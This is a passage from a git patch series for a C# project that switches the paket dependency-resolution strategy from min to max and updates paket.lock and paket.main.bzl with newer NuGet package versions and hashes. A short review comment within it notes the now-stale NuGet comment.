"System.Security.Principal", "System.Text.Encoding"], "netcoreapp1.1": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard1.4": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard1.5": 
["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard1.6": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Text.Encoding", "id": "System.Text.Encoding", "version": "4.3.0", "sha512": "sha512-b/f+7HMTpxIfeV7H03bkuHKMFylCGfr9/U6gePnfFFW0aF8LOWLDgQCY6V1oWUqDksC3mdNuyChM1vy9TP4sZw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], 
"netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Channels", "id": "System.Threading.Channels", "version": "8.0.0", "sha512": "sha512-M1s365f1lOc6s2585/ATW+KRRFFnaI6JvSSdE14n9ZKgvWnZHoJGoccqV41XvtRDrHMCMRNlwWFgt9yXTu3xQQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Text.Encoding.CodePages", "id": 
"System.Text.Encoding.CodePages", "version": "7.0.0", "sha512": "sha512-SFq/rrH52sMHJJsthDdafWPEuxdRCRB7pZ46trR2xSpi1nfKPAbw6amZr9W/LyHTlqS01TRWO7najRuO1vxFig==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Channels", "id": "System.Threading.Channels", "version": "7.0.0", "sha512": "sha512-XXmpdJbyVCagWg3bGfUGNTxKp4EK/3C4Bt8pXhKVYZKwHPjeHPOg0u2wdqHFsojU4u4i9KByAJTyzqLCMqwpUg==", "sources": 
["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.Tasks", "id": "System.Threading.Tasks", "version": "4.3.0", "sha512": "sha512-fUiP+CyyCjs872OA8trl6p97qma/da1xGq3h4zAbJZk8zyaU4zyEfqW5vbkP80xG/Nimun1vlWBboMEk7XxdEw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", 
"Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Tasks.Dataflow", "id": "System.Threading.Tasks.Dataflow", "version": "7.0.0", "sha512": "sha512-nB6cUBEEimO35tPK+KmhUF8jxxisO1E+8KU3eDIA9/o156qulMs8YeozOTcVRYHZWvgn1YCDI/ZR2ga9ErXIfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], 
"net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Tasks.Extensions", "id": "System.Threading.Tasks.Extensions", "version": "4.5.4", "sha512": "sha512-aAUghud9PHGYc3o9oWPWd0C3xE+TJQw5ZZs78htlR6mr9ky/QEgfXHjyQ2GvOq9H1S0YizcVVKCSin92ZcH8FA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], 
"netcoreapp3.1": [], "netstandard": [], "netstandard1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.2": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.3": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.4": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.5": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.6": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.ThreadPool", "id": "System.Threading.ThreadPool", "version": "4.3.0", "sha512": "sha512-RQpA+UpI6Tlpeedk5JStYk2DM/M3i5HqabI/yDbfj1xDu9bIz9kdoquVpHbh/wQjOJaOCbcgRH8iQcAUv8dRWQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime", "System.Runtime.Handles"], "net6.0": ["System.Runtime", "System.Runtime.Handles"], "net7.0": ["System.Runtime", "System.Runtime.Handles"], "net8.0": ["System.Runtime", "System.Runtime.Handles"], "net9.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.1": ["System.Runtime", "System.Runtime.Handles"], 
"netcoreapp2.2": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["System.Runtime", "System.Runtime.Handles"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Windows.Extensions", "id": "System.Windows.Extensions", "version": "7.0.0", "sha512": "sha512-KNnH0GX7T/oRAzOtJjefboYngi+d/bNGd63j+ZIFFTIR8RM0dwptuImNXiKqvD78kzcWAf3kd3yjcih+UTYkbw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": ["System.Drawing.Common"], "net7.0": ["System.Drawing.Common"], "net8.0": ["System.Drawing.Common"], "net9.0": ["System.Drawing.Common"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit", "id": "xunit", "version": "2.9.2", "sha512": "sha512-bs4ccplaqCT7+jdAJhtt75uKq9qA3Jeld1ugiOgGEGSnzq8gkoa0VUqNEKkMPkBwV5COlAllNJGtGBfgxoZDrA==", "sources": ["https://api.nuget.org/v3/index.json"], 
"dependencies": {"net11": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net20": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net30": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net35": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net40": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net403": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net45": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net451": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net452": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net46": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net461": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net462": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net47": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net471": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net472": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net48": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net5.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net6.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net7.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net8.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net9.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.2": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.2": 
["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.3": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.4": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.5": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.6": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.abstractions", "id": "xunit.abstractions", "version": "2.0.3", "sha512": "sha512-PKJri5f0qEQPFvgY6CZR9XG8JROlWSdC/ZYLkkDQuID++Egn+yWjB+Yf57AZ8U6GRlP7z33uDQ4/r5BZPer2JA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.analyzers", "id": "xunit.analyzers", "version": "1.16.0", "sha512": "sha512-65QLxnRoOqpAn2hMnjI1FLmQEjzUye2h4MwRVe1k151K+UFG1Ehr/s/MLwNJ6pCNoyoJjOoNuF7OGW4mH2bdaQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], 
"net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, From 4013eeba8b0319170b9a0bdbaf9334b37cf54399 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 11:37:03 +0100 Subject: [PATCH 0873/1267] C#: Use the newest version of packages instead of the minimum version. --- csharp/paket.dependencies | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/paket.dependencies b/csharp/paket.dependencies index 824e2d73a83..58829b5ec06 100644 --- a/csharp/paket.dependencies +++ b/csharp/paket.dependencies @@ -2,7 +2,7 @@ framework: net9.0 storage: none source https://api.nuget.org/v3/index.json # behave like nuget in choosing transitive dependency versions -strategy: min +strategy: max nuget Basic.CompilerLog.Util nuget Mono.Posix.NETStandard From 347fb1cfd9b75384427d72f35b56866df7cc522d Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 11:37:21 +0100 Subject: [PATCH 0874/1267] C#: Update dependencies. --- csharp/paket.lock | 96 +++++++++++++++++++++---------------------- csharp/paket.main.bzl | 56 ++++++++++++------------- 2 files changed, 75 insertions(+), 77 deletions(-) diff --git a/csharp/paket.lock b/csharp/paket.lock index b80defd8c43..8bfc5b1650e 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock @@ -1,5 +1,5 @@ STORAGE: NONE -STRATEGY: MIN +STRATEGY: MAX RESTRICTION: == net9.0 NUGET remote: https://api.nuget.org/v3/index.json 
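Review bot: The context comment directly above the changed line in csharp/paket.dependencies, `# behave like nuget in choosing transitive dependency versions`, is now stale. NuGet resolves transitive dependencies to the lowest applicable version, which is what `strategy: min` reproduced, while `strategy: max` selects the highest version the constraints allow. I would update the comment along with the setting, for example `# resolve transitive dependencies to the newest version that satisfies the constraints`. With max, every regeneration of paket.lock can move transitive packages to releases that no direct dependency asked for. The version and sha512 changes in paket.lock and paket.main.bzl are therefore where new third-party code enters the build and should be reviewed as such; the lock file still pins what is actually restored.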
@@ -12,11 +12,11 @@ NUGET MSBuild.StructuredLogger (>= 2.2.243) System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (2.5.187) - MessagePack.Annotations (>= 2.5.187) + MessagePack (2.5.192) + MessagePack.Annotations (>= 2.5.192) Microsoft.NET.StringTools (>= 17.6.3) - MessagePack.Annotations (2.5.187) - Microsoft.Bcl.AsyncInterfaces (8.0) + MessagePack.Annotations (2.5.192) + Microsoft.Bcl.AsyncInterfaces (9.0) Microsoft.Build (17.12.6) Microsoft.Build.Framework (>= 17.12.6) Microsoft.NET.StringTools (>= 17.12.6) @@ -25,11 +25,11 @@ NUGET System.Reflection.Metadata (>= 8.0) System.Reflection.MetadataLoadContext (>= 8.0) Microsoft.Build.Framework (17.12.6) - Microsoft.Build.Utilities.Core (17.5) - Microsoft.Build.Framework (>= 17.5) - Microsoft.NET.StringTools (>= 17.5) - System.Collections.Immutable (>= 6.0) - System.Configuration.ConfigurationManager (>= 6.0) + Microsoft.Build.Utilities.Core (17.12.6) + Microsoft.Build.Framework (>= 17.12.6) + Microsoft.NET.StringTools (>= 17.12.6) + System.Collections.Immutable (>= 8.0) + System.Configuration.ConfigurationManager (>= 8.0) Microsoft.CodeAnalysis (4.12) Humanizer.Core (>= 2.14.1) Microsoft.Bcl.AsyncInterfaces (>= 8.0) @@ -47,7 +47,7 @@ NUGET System.Text.Encoding.CodePages (>= 7.0) System.Threading.Channels (>= 7.0) System.Threading.Tasks.Extensions (>= 4.5.4) - Microsoft.CodeAnalysis.Analyzers (3.3.4) + Microsoft.CodeAnalysis.Analyzers (3.11) Microsoft.CodeAnalysis.Common (4.12) Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) System.Collections.Immutable (>= 8.0) @@ -99,8 +99,8 @@ NUGET Microsoft.NET.Test.Sdk (17.12) Microsoft.CodeCoverage (>= 17.12) Microsoft.TestPlatform.TestHost (>= 17.12) - Microsoft.NETCore.Platforms (1.1.1) - Microsoft.NETCore.Targets (1.1.3) + Microsoft.NETCore.Platforms (7.0.4) + Microsoft.NETCore.Targets (5.0) Microsoft.TestPlatform.ObjectModel (17.12) System.Reflection.Metadata (>= 1.6) Microsoft.TestPlatform.TestHost (17.12) 
@@ -111,32 +111,33 @@ NUGET Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) Mono.Posix.NETStandard (1.0) - MSBuild.StructuredLogger (2.2.243) + MSBuild.StructuredLogger (2.2.386) Microsoft.Build.Framework (>= 17.5) Microsoft.Build.Utilities.Core (>= 17.5) + System.Collections.Immutable (>= 8.0) Newtonsoft.Json (13.0.3) System.Buffers (4.6) - System.Collections.Immutable (8.0) - System.Composition (8.0) - System.Composition.AttributedModel (>= 8.0) - System.Composition.Convention (>= 8.0) - System.Composition.Hosting (>= 8.0) - System.Composition.Runtime (>= 8.0) - System.Composition.TypedParts (>= 8.0) - System.Composition.AttributedModel (8.0) - System.Composition.Convention (8.0) - System.Composition.AttributedModel (>= 8.0) - System.Composition.Hosting (8.0) - System.Composition.Runtime (>= 8.0) - System.Composition.Runtime (8.0) - System.Composition.TypedParts (8.0) - System.Composition.AttributedModel (>= 8.0) - System.Composition.Hosting (>= 8.0) - System.Composition.Runtime (>= 8.0) - System.Configuration.ConfigurationManager (8.0) - System.Diagnostics.EventLog (>= 8.0) - System.Security.Cryptography.ProtectedData (>= 8.0) - System.Diagnostics.EventLog (8.0) + System.Collections.Immutable (9.0) + System.Composition (9.0) + System.Composition.AttributedModel (>= 9.0) + System.Composition.Convention (>= 9.0) + System.Composition.Hosting (>= 9.0) + System.Composition.Runtime (>= 9.0) + System.Composition.TypedParts (>= 9.0) + System.Composition.AttributedModel (9.0) + System.Composition.Convention (9.0) + System.Composition.AttributedModel (>= 9.0) + System.Composition.Hosting (9.0) + System.Composition.Runtime (>= 9.0) + System.Composition.Runtime (9.0) + System.Composition.TypedParts (9.0) + System.Composition.AttributedModel (>= 9.0) + System.Composition.Hosting (>= 9.0) + System.Composition.Runtime (>= 9.0) + System.Configuration.ConfigurationManager (9.0) + System.Diagnostics.EventLog (>= 9.0) + System.Security.Cryptography.ProtectedData (>= 
9.0) + System.Diagnostics.EventLog (9.0) System.IO (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) @@ -154,41 +155,38 @@ NUGET System.Threading.Tasks (>= 4.3) System.IO.FileSystem.Primitives (4.3) System.Runtime (>= 4.3) - System.IO.Pipelines (8.0) - System.Memory (4.5.5) + System.IO.Pipelines (9.0) + System.Memory (4.6) System.Net.Primitives (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) System.Runtime (>= 4.3.1) System.Runtime.Handles (>= 4.3) - System.Numerics.Vectors (4.5) - System.Reflection.Metadata (8.0) - System.Collections.Immutable (>= 8.0) - System.Reflection.MetadataLoadContext (8.0) - System.Collections.Immutable (>= 8.0) - System.Reflection.Metadata (>= 8.0) + System.Numerics.Vectors (4.6) + System.Reflection.Metadata (9.0) + System.Reflection.MetadataLoadContext (9.0) System.Runtime (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) - System.Runtime.CompilerServices.Unsafe (6.0) + System.Runtime.CompilerServices.Unsafe (6.1) System.Runtime.Handles (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Security.Cryptography.ProtectedData (8.0) + System.Security.Cryptography.ProtectedData (9.0) System.Security.Principal (4.3) System.Runtime (>= 4.3) System.Text.Encoding (4.3) 